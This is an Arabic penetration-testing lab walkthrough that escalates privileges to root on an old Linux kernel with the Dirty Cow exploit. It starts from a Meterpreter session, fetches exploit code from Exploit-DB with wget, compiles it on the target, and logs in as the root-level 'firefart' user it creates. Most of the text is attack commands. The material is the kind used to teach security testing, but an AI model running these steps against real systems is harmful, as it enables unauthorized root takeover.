🧪 المختبر 6: رفع امتيازات Linux باستخدام استغلال Kernel (Dirty Cow)

🎯 الهدف الأساسي: رفع الامتيازات إلى المستخدم root على نظام Linux باستخدام استغلال ثغرة Kernel (مثل Dirty Cow).

🔧 الأدوات المستخدمة, (Linux Exploit Suggester script).

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: ما بعد الاستغلال (التعداد المحلي، رفع الامتيازات)

  1. الحصول على الوصول الأولي والتعداد المحلي:

    • بعد الحصول على جلسة Meterpreter الأولية على الهدف.

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      sysinfo
    • الشرح: إذا نفذت هذا الأمر، ستحصل على معلومات حول نظام التشغيل (مثل Ubuntu 12.04) وإصدار Kernel (مثل 3.2.0-23-generic)، بالإضافة إلى بنية النظام (64 بت).

  2. تحديد استغلالات Kernel المحتملة:

    • قم بتحميل سكريبت Linux Exploit Suggester (lees.sh) إلى النظام المستهدف.

    • الأمر:

      upload /path/to/lees.sh /tmp/lees.sh
      shell
      chmod +x /tmp/lees.sh
      /tmp/lees.sh
    • الشرح: إذا نفذت هذه الأوامر، سيقوم السكريبت بتعداد الثغرات الأمنية المحتملة التي تؤثر على إصدار Kernel الخاص بالهدف، وسيعرض قائمة بالاستغلالات، مع الإشارة إلى احتمالية النجاح.

  3. الحصول على كود الاستغلال وتجميعه (Compile):

    • قم بتنزيل كود استغلال Dirty Cow (أو الاستغلال الذي اخترته) بصيغة C من Exploit-DB إلى جهاز Kali Linux الخاص بك.

    • الأمر:

      wget https://www.exploit-db.com/raw/40839
      mv 40839 dirty.c
    • الشرح: إذا نفذت هذه الأوامر، سيتم تنزيل الكود وحفظه.

    • قم بتحميل كود C إلى الهدف.

    • الأمر:

      upload /path/to/dirty.c /tmp/dirty.c
    • تجميع الكود على الهدف: يجب تجميع الكود على النظام المستهدف لتجنب مشاكل التوافق.

    • الأمر الأساسي:

      shell
      gcc -pthread /tmp/dirty.c -o /tmp/dirty
      chmod +x /tmp/dirty
    • الشرح: إذا نفذت هذا الأمر، سيتم تجميع كود C لإنشاء ملف تنفيذي باسم dirty في مجلد /tmp، وسيتم منحه صلاحيات التنفيذ.

  4. تنفيذ الاستغلال ورفع الامتيازات:

    • قم بتشغيل الاستغلال مع توفير كلمة مرور جديدة للمستخدم الجذر.

    • الأمر:

      /tmp/dirty newpassword123
    • الشرح: سيقوم الاستغلال بإنشاء مستخدم جديد بامتيازات الجذر أو بتغيير كلمة مرور مستخدم موجود.

    • الأمر الأساسي:

      su firefart
    • الشرح: بيطلب منك كلمة المرور الجديدة. إذا أدخلتها بشكل صحيح، فستحصل على جلسة Shell بامتيازات الجذر.

    • طريقة بديلة (SSH): إذا كان SSH مُمكّناً على الهدف، يمكنك تسجيل الدخول كمستخدم الجذر الجديد.

    • الأمر:

      ssh firefart@<Target_IP>

وبكذا انت وحش

Last updated